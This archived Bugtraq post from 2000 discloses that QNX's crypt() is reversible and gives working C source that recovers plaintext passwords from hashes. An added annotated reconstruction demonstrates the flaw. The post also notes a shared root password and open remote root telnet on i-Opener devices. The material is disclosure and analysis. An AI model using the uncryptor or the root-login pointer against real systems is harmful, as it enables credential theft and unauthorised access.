[14531] in bugtraq
qnx crypt compromised
daemon@ATHENA.MIT.EDU (Sean)
Sun Apr 16 21:43:00 2000
Message-Id: <20000415030309.6007.qmail@securityfocus.com>
Date: Sat, 15 Apr 2000 03:03:09 -0000
Reply-To: Sean <skasun@AZSTARNET.COM>
From: Sean <skasun@AZSTARNET.COM>
X-To: bugtraq@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM
The crypt function for QNX turned out to be a bit mixer, not a
hash function. It's now possible to extract plaintext from
the hashes.
On a related note, all IOpeners (running QNX) use the same
root password. Telnetd is running, and allows remote login
as root. This is a huge security hole, as you can search
UUNET for IOpeners and telnet in as root.
Source for the uncryptor is below:
#include <stdio.h>
#include <string.h>

/* map one character of the hash text to its 6-bit value */
static int ascii2bin(short x)
{
    if (x >= '0' && x < 'A')
        return x - '0';
    if (x >= 'A' && x < 'a')
        return (x - 'A') + 9;
    return (x - 'a') + 26 + 9;
}

char bits[77];

/* pw is the 14-character hash: 2 salt chars followed by 12 hash chars */
char *quncrypt(char *pw)
{
    static char newpw[14];
    int i;
    int j, rot;
    int bit;
    char salt[2];

    salt[0] = *pw++;                    /* first two characters are the salt */
    salt[1] = *pw++;
    for (i = 0; i < 72; i++)
        bits[i] = 0;
    for (i = 0; i < 12; i++)            /* 12 hash characters, 6 bits each */
        newpw[i] = ascii2bin(pw[i]);
    newpw[13] = 0;
    rot = (salt[1] * 4 - salt[0]) % 128; /* here's all the salt does. A rotation */
    for (i = 0; i < 12; i++) {
        for (j = 0; j < 6; j++) {
            bit = newpw[i] & (1 << j);  /* move password into bit array */
            bits[i * 6 + j] = bit ? 1 : 0;
        }
    }
    while (rot--) {                     /* do the big rotate */
        bits[66] = bits[0];
        for (i = 0; i <= 65; i++)
            bits[i] = bits[i + 1];
    }
    for (i = 0; i < 8; i++) {           /* 8 password characters, 7 bits each */
        newpw[i] = 0;
        for (j = 0; j < 7; j++) {
            bit = bits[i + j * 8];
            newpw[i] |= (bit << j);     /* and compile the bit array back */
        }
    }
    newpw[8] = 0;
    return newpw;
}

int main(int argc, char **argv)
{
    if (argc != 2 || strlen(argv[1]) < 14) {
        fprintf(stderr, "usage: %s <14-character qnx hash>\n", argv[0]);
        return 1;
    }
    printf("%s\n", quncrypt(argv[1]));
    return 0;
}
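The post says the salt only rotates and that the transform is a bit mixer rather than a hash. The block below is an added example, not part of Sean's post and not QNX source: it reconstructs the forward direction as the exact inverse of the posted quncrypt() (an assumption about what QNX's crypt() does, derived only from the inverse above and not checked against a real QNX box), round-trips a password through both directions, and counts how many hash bits change when one password bit changes. The names qcrypt_reconstructed, quncrypt_clean, roundtrip_ok, hash_distance_for and the sample password and salt are made up for the example.

```c
/* Added example; assumption: forward transform reconstructed as the exact
 * inverse of the posted quncrypt(), not verified against QNX's own crypt(). */
#include <stdio.h>
#include <string.h>

#define NBITS  72   /* 12 hash chars * 6 bits */
#define ROTLEN 67   /* quncrypt() rotates only bits[0..66] */
#define PWLEN  8    /* 8 password chars * 7 bits = 56 bits carried */

/* same digit alphabet as the posted ascii2bin() */
static int ascii2bin(int c)
{
    if (c >= '0' && c < 'A') return c - '0';
    if (c >= 'A' && c < 'a') return (c - 'A') + 9;
    return (c - 'a') + 26 + 9;
}

/* a right-inverse of ascii2bin(): ascii2bin(bin2ascii(v)) == v for 0..63 */
static int bin2ascii(int v)
{
    if (v < 10) return '0' + v;
    if (v < 35) return 'A' + (v - 9);    /* 10..34 -> 'B'..'Z' */
    if (v < 61) return 'a' + (v - 35);   /* 35..60 -> 'a'..'z' */
    return '{' + (v - 61);               /* 61..63 -> '{'..'}' */
}

/* the salt contributes nothing but this rotation count (formula from the post) */
static int salt_rot(const char *salt)
{
    return ((unsigned char)salt[1] * 4 - (unsigned char)salt[0]) % 128;
}

/* reconstructed forward direction: password + 2-char salt -> 14-char hash.
 * Only the low 7 bits of the first 8 password bytes are carried. */
char *qcrypt_reconstructed(const char *pw, const char *salt, char out[15])
{
    unsigned char plain[ROTLEN] = {0}, bits[NBITS] = {0};
    int rot = salt_rot(salt), len = (int)strlen(pw), i, j;

    for (i = 0; i < PWLEN; i++) {          /* scatter bits as quncrypt() gathers them */
        int c = i < len ? (unsigned char)pw[i] : 0;
        for (j = 0; j < 7; j++) plain[i + j * 8] = (c >> j) & 1;
    }
    for (i = 0; i < ROTLEN; i++)           /* undo the left rotation of the 67-bit window */
        bits[(i + rot) % ROTLEN] = plain[i];
    out[0] = salt[0];
    out[1] = salt[1];
    for (i = 0; i < 12; i++) {             /* pack 6 bits per hash character */
        int v = 0;
        for (j = 0; j < 6; j++) v |= bits[i * 6 + j] << j;
        out[2 + i] = (char)bin2ascii(v);
    }
    out[14] = 0;
    return out;
}

/* the posted quncrypt(), with an indexed rotation; hash must be 14 chars */
char *quncrypt_clean(const char *hash, char out[PWLEN + 1])
{
    unsigned char bits[NBITS], rotated[ROTLEN];
    int rot = salt_rot(hash), i, j;

    for (i = 0; i < 12; i++) {
        int v = ascii2bin((unsigned char)hash[2 + i]);
        for (j = 0; j < 6; j++) bits[i * 6 + j] = (v >> j) & 1;
    }
    for (i = 0; i < ROTLEN; i++) rotated[i] = bits[(i + rot) % ROTLEN];
    for (i = 0; i < PWLEN; i++) {
        int c = 0;
        for (j = 0; j < 7; j++) c |= rotated[i + j * 8] << j;
        out[i] = (char)c;
    }
    out[PWLEN] = 0;
    return out;
}

/* 1 if crypt-then-uncrypt returns the password unchanged */
int roundtrip_ok(const char *pw, const char *salt)
{
    char h[15], back[PWLEN + 1];
    qcrypt_reconstructed(pw, salt, h);
    return strcmp(pw, quncrypt_clean(h, back)) == 0;
}

/* Hamming distance between the 72 payload bits of the two passwords' hashes.
 * A real hash would flip about half of them for a one-bit change; this flips one. */
int hash_distance_for(const char *pw1, const char *pw2, const char *salt)
{
    char a[15], b[15];
    int i, d = 0;
    qcrypt_reconstructed(pw1, salt, a);
    qcrypt_reconstructed(pw2, salt, b);
    for (i = 2; i < 14; i++) {
        int x = ascii2bin((unsigned char)a[i]) ^ ascii2bin((unsigned char)b[i]);
        for (; x; x >>= 1) d += x & 1;
    }
    return d;
}

int main(int argc, char **argv)
{
    /* constructed sample inputs; run as: prog <password> <salt> to use your own */
    const char *pw = argc > 2 ? argv[1] : "secret77";
    const char *salt = argc > 2 ? argv[2] : "Ab";
    char h[15], back[PWLEN + 1];
    qcrypt_reconstructed(pw, salt, h);
    printf("hash %s -> recovered %s\n", h, quncrypt_clean(h, back));
    printf("one-bit password change flips %d hash bit(s)\n",
           hash_distance_for("secret77", "secret76", salt));
    return 0;
}
```

Two things worth noticing when running it: the hash-to-password direction loses nothing for 8-character ASCII passwords, because every step (digit alphabet, 67-bit rotation, bit scatter) is a permutation, and a one-bit change in the password moves exactly one bit in the hash, which is the "bit mixer, not a hash function" point made in the post. In this reconstruction bits 56..71 of the hash text never receive password bits, so whatever a real QNX crypt() puts there is not modelled here.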